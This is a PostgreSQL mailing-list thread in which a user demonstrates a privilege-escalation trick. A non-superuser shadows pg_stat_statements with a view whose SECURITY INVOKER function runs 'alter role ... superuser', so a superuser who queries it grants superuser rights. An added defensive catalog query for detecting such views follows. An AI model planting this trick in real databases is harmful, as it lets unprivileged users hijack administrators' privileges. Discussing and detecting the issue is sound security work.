And what would be an acceptable solution/behavior in your eyes?
On Tuesday, September 29, 2015, 德哥 <digoal@126.com> wrote:
>
> The point is:
> Superusers can be tricked, like with phishing sites.
> For example:
> A DBA, or some monitoring / admin software, queries these tables or views.
>
> --
> Public welfare is a lifelong endeavour, I'm Digoal, Just Do It.
>
> On 2015-09-30 10:01:12, "David G. Johnston" <david.g.johnston@gmail.com> wrote:
>
> On Tuesday, September 29, 2015, 德哥 <digoal@126.com> wrote:
>
>> A normal user gets superuser privilege using a security invoker function.
>> postgres=> create table pg_stat_statements (
>> userid oid ,
>> dbid oid ,
>> queryid bigint ,
>> query text ,
>> calls bigint ,
>> total_time double precision ,
>> rows bigint ,
>> shared_blks_hit bigint ,
>> shared_blks_read bigint ,
>> shared_blks_dirtied bigint ,
>> shared_blks_written bigint ,
>> local_blks_hit bigint ,
>> local_blks_read bigint ,
>> local_blks_dirtied bigint ,
>> local_blks_written bigint ,
>> temp_blks_read bigint ,
>> temp_blks_written bigint ,
>> blk_read_time double precision ,
>> blk_write_time double precision );
>>
>> postgres=> create or replace function f() returns pg_stat_statements as
>> $$
>> declare
>> begin
>> alter role digoal superuser;
>> end;
>> $$ language plpgsql security invoker;
>> CREATE FUNCTION
>>
>> postgres=> create rule "_RETURN" as on select to pg_stat_statements do
>> instead select * from f();
>> CREATE RULE
>>
>> When a superuser selects the view pg_stat_statements, the normal user
>> digoal will be granted the superuser role.
>>
>> Yes, it's a normal operation, but somebody can use this trick.
>>
>
>
> Everything you just wrote was done as superuser so what's your point?
>
> David J.
>
>
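An added defensive check, not code from either poster in this thread: a catalog query that surfaces the pattern described above, a view owned by a non-superuser whose ON SELECT rule depends on a user-defined function, so a DBA or monitoring job can review such objects before querying them from a privileged session. It assumes only the standard PostgreSQL catalogs (pg_class, pg_rewrite, pg_depend, pg_proc, pg_roles, pg_namespace).

```sql
-- Added example (not from the thread). Lists views outside the system schemas
-- that are owned by a non-superuser and whose ON SELECT rule ("_RETURN")
-- depends on a non-system function. The dependencies of a view's query are
-- recorded in pg_depend against the rewrite rule, so joining through
-- pg_rewrite finds the functions the view will call. A function with
-- prosecdef = false (SECURITY INVOKER, the default) runs with the privileges
-- of whoever SELECTs from the view, which is exactly what the thread shows.
SELECT n.nspname             AS view_schema,
       c.relname             AS view_name,
       r.rolname             AS view_owner,
       pn.nspname            AS func_schema,
       p.proname             AS func_name,
       pr.rolname            AS func_owner,
       p.prosecdef           AS security_definer,  -- false = runs as the caller
       EXISTS (SELECT 1 FROM pg_class o
               WHERE o.relname = c.relname
                 AND o.oid <> c.oid)
                             AS name_collides,     -- e.g. shadows pg_stat_statements
       pg_get_viewdef(c.oid) AS definition
FROM   pg_class      c
JOIN   pg_namespace  n  ON n.oid  = c.relnamespace
JOIN   pg_roles      r  ON r.oid  = c.relowner
JOIN   pg_rewrite    rw ON rw.ev_class = c.oid
                       AND rw.rulename = '_RETURN'
JOIN   pg_depend     d  ON d.classid    = 'pg_rewrite'::regclass
                       AND d.objid      = rw.oid
                       AND d.refclassid = 'pg_proc'::regclass
JOIN   pg_proc       p  ON p.oid  = d.refobjid
JOIN   pg_namespace  pn ON pn.oid = p.pronamespace
JOIN   pg_roles      pr ON pr.oid = p.proowner
WHERE  c.relkind = 'v'
  AND  NOT r.rolsuper
  AND  n.nspname  NOT IN ('pg_catalog', 'information_schema')
  AND  pn.nspname NOT IN ('pg_catalog', 'information_schema')
ORDER  BY view_schema, view_name, func_schema, func_name;
```

A non-empty result is not proof of abuse, but each row is a view that a superuser or monitoring role should not query through an unqualified name or a search_path that resolves to it; qualifying system views by schema and keeping a fixed search_path for privileged sessions removes the name-confusion step entirely.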